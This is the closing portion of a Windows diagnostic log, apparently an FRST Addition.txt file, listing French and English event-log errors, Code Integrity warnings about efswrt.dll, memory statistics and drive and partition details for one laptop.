Description: Le package Microsoft.MicrosoftEdge_25.10586.672.0_neutral__8wekyb3d8bbwe+MicrosoftEdge#{ddcbed84-872b-4073-944e-a23a5ba75e89} a été interrompu, car sa suspension a été trop longue.
Error: (10/10/2017 10:17:44 AM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 2484) (User: LAPTOP-RUV870D4)
Description: Le package Microsoft.MicrosoftEdge_25.10586.672.0_neutral__8wekyb3d8bbwe+MicrosoftEdge#{173eba07-8b59-4d92-be75-05e703c71534} a été interrompu, car sa suspension a été trop longue.
Error: (10/10/2017 10:16:43 AM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 2484) (User: LAPTOP-RUV870D4)
Description: Le package Microsoft.MicrosoftEdge_25.10586.672.0_neutral__8wekyb3d8bbwe+MicrosoftEdge a été interrompu, car sa suspension a été trop longue.
Error: (10/10/2017 09:53:47 AM) (Source: MsiInstaller) (EventID: 10005) (User: NT AUTHORITY)
Description: Product: KB4023057 -- A later version of KB4023057 is already installed. Setup will now exit.
Error: (10/09/2017 07:04:30 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledSPRetry 6547
Error: (10/09/2017 07:04:30 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledEvent 6547
Error: (10/09/2017 07:04:30 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: Continuously busy for more than a second
Error: (10/09/2017 07:04:29 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledSPRetry 5469
System errors:
=============
Error: (10/10/2017 10:27:20 AM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Le service Device Install Service n’a pas pu démarrer en raison de l’erreur :
Le client d’un composant a demandé une opération qui n’est pas valide compte tenu de l’état de l’instance du composant.
Error: (10/10/2017 09:50:09 AM) (Source: Microsoft-Windows-DNS-Client) (EventID: 1012) (User: NT AUTHORITY)
Description: Une erreur s’est produite lors de la lecture du fichier d’hôtes local.
Error: (10/10/2017 09:48:23 AM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Le service 7fa873b86c1118b0b18259f1000e475e n’a pas pu démarrer en raison de l’erreur :
Le service n’a pas répondu assez vite à la demande de lancement ou de contrôle.
Error: (10/10/2017 09:48:23 AM) (Source: Service Control Manager) (EventID: 7009) (User: )
Description: Le dépassement de délai (60000 millisecondes) a été atteint lors de l’attente de la connexion du service 7fa873b86c1118b0b18259f1000e475e.
Error: (10/10/2017 09:46:20 AM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: Le service Sync Host_bc22cb s’est terminé de manière inattendue. Ceci s’est produit 1 fois. L’action corrective suivante va être effectuée dans 10000 millisecondes : Restart the service.
Error: (10/10/2017 09:42:54 AM) (Source: Microsoft-Windows-WLAN-AutoConfig) (EventID: 4003) (User: NT AUTHORITY)
Description: Le service de configuration automatique de réseau WLAN a détecté une connectivité limitée en exécutant Reset/Recover.adapter.
Code : 8 0x0 0x0
Error: (10/10/2017 09:42:50 AM) (Source: Microsoft-Windows-WLAN-AutoConfig) (EventID: 4003) (User: NT AUTHORITY)
Description: Le service de configuration automatique de réseau WLAN a détecté une connectivité limitée en exécutant Reset/Recover.adapter.
Code : 2 0xdeaddeed 0xeeec
Error: (10/10/2017 09:42:50 AM) (Source: Microsoft-Windows-WLAN-AutoConfig) (EventID: 4003) (User: NT AUTHORITY)
Description: Le service de configuration automatique de réseau WLAN a détecté une connectivité limitée en exécutant Reset/Recover.adapter.
Code : 1 0xc 0x4
Error: (10/10/2017 09:42:11 AM) (Source: DCOM) (EventID: 10016) (User: LAPTOP-RUV870D4)
Description: Les paramètres d’autorisation application-specific n’accordent pas l’autorisation Local Activation pour l’application serveur COM avec le CLSID
{9E175B6D-F52A-11D8-B9A5-505054503030}
et l’APPID
{9E175B9C-F52A-11D8-B9A5-505054503030}
au SID LAPTOP-RUV870D4\hp de l’utilisateur (S-1-5-21-2924308242-708578159-770495721-1002) depuis l’adresse LocalHost (Using LRPC) s’exécutant dans le SID Microsoft.MicrosoftEdge_25.10586.672.0_neutral__8wekyb3d8bbwe du conteneur d’applications (S-1-15-2-3624051433-2125758914-1423191267-1740899205-1073925389-3782572162-737981194). Cette autorisation de sécurité peut être modifiée à l’aide de l’outil d’administration Services de composants.
Error: (10/10/2017 09:42:09 AM) (Source: DCOM) (EventID: 10016) (User: LAPTOP-RUV870D4)
Description: Les paramètres d’autorisation application-specific n’accordent pas l’autorisation Local Activation pour l’application serveur COM avec le CLSID
{9E175B6D-F52A-11D8-B9A5-505054503030}
et l’APPID
{9E175B9C-F52A-11D8-B9A5-505054503030}
au SID LAPTOP-RUV870D4\hp de l’utilisateur (S-1-5-21-2924308242-708578159-770495721-1002) depuis l’adresse LocalHost (Using LRPC) s’exécutant dans le SID Microsoft.MicrosoftEdge_25.10586.672.0_neutral__8wekyb3d8bbwe du conteneur d’applications (S-1-15-2-3624051433-2125758914-1423191267-1740899205-1073925389-3782572162-737981194-4256926629-1688279915-2739229046-3928706915). Cette autorisation de sécurité peut être modifiée à l’aide de l’outil d’administration Services de composants.
CodeIntegrity:
===================================
Date: 2017-10-09 18:06:56.750
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.
Date: 2017-10-09 17:57:11.341
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.
Date: 2017-10-03 08:21:08.688
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.
Date: 2017-10-03 08:14:08.895
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.
Date: 2017-09-30 07:30:08.496
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.
Date: 2017-09-30 07:22:09.657
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.
Date: 2017-09-30 07:12:53.359
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.
Date: 2017-09-26 17:57:14.429
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.
Date: 2017-09-25 18:25:51.839
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.
Date: 2017-09-25 18:15:04.462
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.
==================== Memory info ===========================
Processor: Intel(R) Core(TM) i3-5005U CPU @ 2.00GHz
Percentage of memory in use: 43%
Total physical RAM: 4011.39 MB
Available physical RAM: 2268.38 MB
Total Virtual: 7406.89 MB
Available Virtual: 5191.22 MB
==================== Drives ================================
Drive c: (WINDOWS) (Fixed) (Total:465.61 GB) (Free:370.49 GB) NTFS
Drive d: (RECOVERY) (Fixed) (Total:19.43 GB) (Free:2.27 GB) NTFS ==>[system with boot components (obtained from drive)]
Drive f: (DISQUE A) (Fixed) (Total:250.2 GB) (Free:250.08 GB) NTFS
Drive g: (Nouveau nom) (Fixed) (Total:195.31 GB) (Free:54.46 GB) NTFS
Drive h: (AUBIN) (Removable) (Total:14.44 GB) (Free:6.79 GB) FAT32
==================== MBR & Partition Table ==================
========================================================
Disk: 0 (Size: 931.5 GB) (Disk ID: 42759ECA)
Partition: GPT.
========================================================
Disk: 1 (Size: 14.5 GB) (Disk ID: 2F004373)
Partition 1: (Not Active) - (Size=14.5 GB) - (Type=0C)
==================== End of Addition.txt ============================